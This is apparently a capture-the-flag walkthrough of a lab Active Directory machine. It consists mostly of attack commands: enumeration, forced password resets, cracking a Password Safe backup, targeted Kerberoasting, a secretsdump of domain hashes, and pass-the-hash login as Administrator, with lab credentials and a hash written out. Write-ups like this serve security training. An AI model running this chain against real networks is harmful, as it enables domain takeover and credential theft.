# Administrator
### Initial Nmap Enumeration
```bash
nmap -p- -sVC 10.129.76.49
```
### Get Hostname
```bash
nxc smb 10.129.76.49
```
### Edit /etc/hosts
```bash
cat /etc/hosts
```
### Save Given Credentials
```bash
cat credentials.txt
```
### SMB & WINRM Login with Credentials
```bash
nxc smb 10.129.76.49 -u olivia -p ichliebedich
nxc winrm 10.129.76.49 -u olivia -p ichliebedich
```
### Get WinRM Shell
```bash
evil-winrm -i 10.129.76.49 -u olivia -p ichliebedich
```
### Enumerate Local Users via WinRM
```bash
net users
```
### BloodHound Enumeration
.png?alt=media&token=75941329-53cd-4c59-942a-739478918b52)
.png?alt=media&token=f1dd45e7-75b6-47ca-bd51-496b75bf2ac9)
.png?alt=media&token=02c3ef67-7a87-4876-ac8f-2f4d2db14f09)
```bash
bloodhound-python -c all -d administrator.htb -u olivia -p ichliebedich -ns 10.129.76.49
```
### Change Michael Password
```bash
net rpc password "michael" "password" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.129.76.49"
```
### Change Benjamin Password
```bash
net rpc password "benjamin" "password" -U "administrator.htb"/"michael"%"password" -S "10.129.76.49"
```
### Verify Password Changes
```bash
nxc smb 10.129.76.49 -u michael -p password
nxc smb 10.129.76.49 -u benjamin -p password
```
### FTP Login & Retrieve Backup File
```bash
ftp 10.129.76.49
get Backup.psafe3
```
### Crack psafe3 File
```bash
hashcat Backup.psafe3 -m 5200 /usr/share/wordlists/rockyou.txt
```
### Password Safe
.png?alt=media&token=68c6a2c6-9744-4502-a6ef-b93dd3aff54b)
### SMB Login with Emily
```bash
nxc smb 10.129.76.49 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
```
### BloodHound
.png?alt=media&token=d5664895-080d-4827-8993-b167312b8d28)
### Sync Time with DC
```bash
sudo ntpdate 10.129.76.49
```
### Kerberoast Attack
```bash
python3 targetedKerberoast.py -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
```
### Crack Kerberoast Hash
```bash
hashcat hashes.krb /usr/share/wordlists/rockyou.txt
```
### SMB Login with Ethan
```bash
nxc smb 10.129.76.49 -u ethan -p limpbizkit
```
### Dump Hashes with Secretsdump
```bash
secretsdump.py administrator.htb/ethan@10.129.76.49
```
### Get Root via Evil-WinRM with Administrator Hash
```bash
evil-winrm -i 10.129.76.49 -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
cat C:\users\Administrator\Desktop\root.txt
```
### Get User Flag
```bash
cat C:\users\emily\Desktop\user.txt
```
.png?alt=media&token=2ef0a694-c2a3-40bf-a912-d21716235357)
.png?alt=media&token=f39ac2b8-071b-4860-bde0-92475b7d0e4d)